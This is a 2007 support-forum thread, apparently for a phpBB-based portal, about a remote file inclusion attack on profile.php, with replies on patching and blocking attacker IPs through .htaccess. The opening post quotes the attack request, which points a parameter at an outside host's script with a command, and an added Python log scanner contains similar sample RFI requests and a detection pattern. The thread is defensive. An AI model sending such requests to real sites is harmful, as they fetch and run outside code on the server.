
Security Flaw

PostAuthor: Omni-Lee » Tue May 15, 2007 4:14 pm

A security flaw has been found with Profile.php, my website was hacked with the below command.

201.29.250.108 - - [30/Apr/2007:21:43:11 -0400] "GET http://<websiteURL>/forum/profile.php?mode=http://www.narkote.net/tool25.txt?&cmd=id HTTP/1.1" 200 1372 <websiteURL> "-" "-" "-"

My website's URL was removed to protect my site. My hope is that someone can find the security flaw within the offending file and create a patch ASAP. The profile system and all it entails is currently OFFLINE on my website.

PostAuthor: Helter » Tue May 15, 2007 7:09 pm

Try this:

Open profile.php.

Find

Code:
define('IN_PHPBB', true);

After it, add

Code:
$phpbb_root_path = './';

Save and close. Not sure if that is how they got in, but it will help.

PostAuthor: ZacFields » Tue May 15, 2007 7:27 pm

He must still be on 140 because 141 already has that piece of code inserted.

Zac

PostAuthor: Helter » Tue May 15, 2007 9:03 pm

You're correct. The code was there, it was just moved and I didn't see it... lol

PostAuthor: ZacFields » Tue May 15, 2007 9:08 pm

I don't think 140 had that though, and I think that's the string of code that stops those RFI attacks.

As long as they're not gaining access, it's pretty much the equivalent of a DDOS attack. Find the IPs and block them from .htaccess.

Zac

PostAuthor: Omni-Lee » Tue May 15, 2007 11:04 pm

I'm using 1.4.1, but I'll check the file and make the required changes.

Yes, the suggested changes are already within the file.

Is there anything else to try?

PostAuthor: Omni-Lee » Wed May 16, 2007 3:48 pm

Is there any further information I can supply to help have this issue resolved?

Until this issue is fixed I cannot enable the Profile system within my site. As such, any and all systems that are associated with Profiles are also disabled.

I eagerly await a fix.

PostAuthor: nGAGE » Wed May 16, 2007 10:00 pm

Check your CT Log... shouldn't CT block this stuff? Had a couple myself, but no harm done on site. CT Log showed them as blocked!

PostAuthor: ZacFields » Wed May 16, 2007 11:46 pm

As long as that code is in place that helterskelter mentioned, this attack is as worthless as a DDOS attack. I suggest just to keep blocking the IPs from .htaccess and just make sure they're not getting root access (which they shouldn't be able to), and the problem will disappear when the person initiating the exploits finally realizes that the hole is patched.

I had this same problem a month or so ago and just turned out to be nothing. It was a pain in my neck, but the long and short of it is that anyone who is not banned via .htaccess can run requests on your server to any file on your server. All that's happening in this situation is that they're running requests on your server. But beware as blocking them from phpbb or crackertracker will not solve this problem. These IP's need to be blocked from .htaccess to prevent them from running requests on your forum's files. Blocking them from crackertracker and/or phpbb just keeps them from enjoying forum functions.

Zac

PostAuthor: nGAGE » Wed May 16, 2007 11:58 pm

Perhaps a good example of what should be added to the .htaccess file(s)? <= (assuming that it's needed in more than just the root?)
I'm sure a lot of people would appreciate it!

Never really needed to block IPs that way myself. Only providing the necessary access to run the forum, nothing more.

PostAuthor: Omni-Lee » Thu May 17, 2007 5:28 am

The problem is, the attack I posted wasn't caught by CT, it was caught by my host after I had informed them that I was under attack. How can I block the IP of an attack when I don't know it? What does the attack allow the hackers to do?

Cripes I'm a kinship (guild) website for LoTRO, what's the point of hacking me?

PostAuthor: ZacFields » Thu May 17, 2007 7:45 am

In the example that you posted, Omni-Lee, the IP that was attacking you was 201.29.250.108; it's just the IP address at the beginning of that piece of log that you posted.

Here is an example of what to put in .htaccess:

Code:
order allow,deny
deny from 127.0.0.1
deny from 127.0.0.2
deny from 127.0.0.3
allow from all

You would replace the 127.0.0.1, 127.0.0.2 etc. with the IPs you want to ban. The .htaccess in your root directory should be able to take care of this for you. This will prevent them from making any requests on your server.

Zac
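As an added example (not code from this thread, from IntegraMOD or from phpBB), the following Python script answers "how can I block the IP of an attack when I don't know it?": it scans Apache access-log lines like the one Omni-Lee posted for query-string values that are themselves remote URLs, collects the source IPs, and renders them as deny rules in the same order allow,deny form Zac shows above. The log lines and IP addresses are constructed samples from documentation ranges.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Apache "combined"-style access log: ip ident user [timestamp] "METHOD url PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3})'
)
REMOTE_SCHEMES = ("http://", "https://", "ftp://")


def is_rfi_attempt(url):
    """True if any query-string value is itself a remote URL (the classic RFI pattern).

    parse_qsl percent-decodes values, so an encoded http%3A%2F%2F... is caught as well.
    A value that merely contains the word "http" is not flagged.
    """
    query = urlsplit(url).query
    return any(v.lower().startswith(REMOTE_SCHEMES)
               for _, v in parse_qsl(query, keep_blank_values=True))


def scan_log(lines):
    """Map each source IP to the list of request URLs that look like RFI attempts."""
    hits = {}
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_rfi_attempt(m["url"]):
            hits.setdefault(m["ip"], []).append(m["url"])
    return hits


def htaccess_block(ips):
    """Render the deny list in the 'order allow,deny' form used in the thread."""
    rules = ["order allow,deny"] + [f"deny from {ip}" for ip in sorted(ips)] + ["allow from all"]
    return "\n".join(rules) + "\n"


# Constructed sample log (documentation IP ranges, not real hosts).
SAMPLE_LOG = """\
203.0.113.7 - - [30/Apr/2007:21:43:11 -0400] "GET /forum/profile.php?mode=http://198.51.100.9/t.txt?&cmd=id HTTP/1.1" 200 1372
192.0.2.25 - - [30/Apr/2007:21:44:02 -0400] "GET /forum/profile.php?mode=viewprofile&u=2 HTTP/1.1" 200 9312
203.0.113.7 - - [30/Apr/2007:21:45:40 -0400] "GET /forum/index.php?phpbb_root_path=http%3A%2F%2F198.51.100.9%2Ft.txt%3F HTTP/1.1" 200 512
192.0.2.40 - - [30/Apr/2007:21:46:01 -0400] "GET /forum/viewtopic.php?t=5&highlight=http HTTP/1.1" 200 4100
"""

if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG.splitlines())
    for ip, urls in found.items():
        print(f"{ip}: {len(urls)} suspicious request(s)")
    print(htaccess_block(found))
```

The rendered block is what Zac suggests pasting into the root .htaccess and also what you would send to your host.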

PostAuthor: nGAGE » Thu May 17, 2007 8:15 am

Ah... K... just like the access definitions in the apache/conf/httpd.conf :P


Thnx Zac

PostAuthor: ZacFields » Thu May 17, 2007 9:40 am

^ LoL yes, please don't be banning the IPs from the example. That's a bad thing to do!

Keep us informed on this, though. But I'm pretty sure they're just trying out a very outdated exploit that might have worked on 1.4.0 but not on 1.4.1. There's just no real good way to stop them from doing it other than just continuing to ban their IPs from .htaccess.

Usually what happens is that they take control of hundreds of different servers and they use those servers to do all their dirty work for them. They just load up a .script on those servers that starts attacking other servers. What they do is very simple to do.... there are very few people that actually know how to hack, and WAY TOO MANY people who just leech off of other people's pre-written .scripts.

Also, while you're banning those IP addresses, it would be a good idea to send the list of IPs to your host. Oftentimes your host will want them so they can also ban them from their side, too. That way it keeps those IPs from accessing any sites on that host.

Zac

PostAuthor: ZacFields » Thu May 17, 2007 9:45 am

Omni-Lee wrote:
Cripes I'm a kinship (guild) website for LoTRO, what's the point of hacking me?

I asked this same question when they were successfully gaining access to my root account through an old copy of 140 I had lying around on my server. My good friend that helped me rid my site of these hackers (I seriously had 3 different hackers who had access to my root at the time) notified me that the likelihood that they cared anything about my site was slim, but by gaining root access into my account they can get into other websites on my host a lot easier. And they can also use my server to help attack other servers.

It's just a big game to them. But if your site has no financial records such as customer credit card numbers and stuff, these hackers probably don't care anything about your site and probably won't do anything to it. Like I said, I had 3 of them in my box all at once and not one of them ever touched my forums. They were just running .scripts off my site attacking other servers.

Zac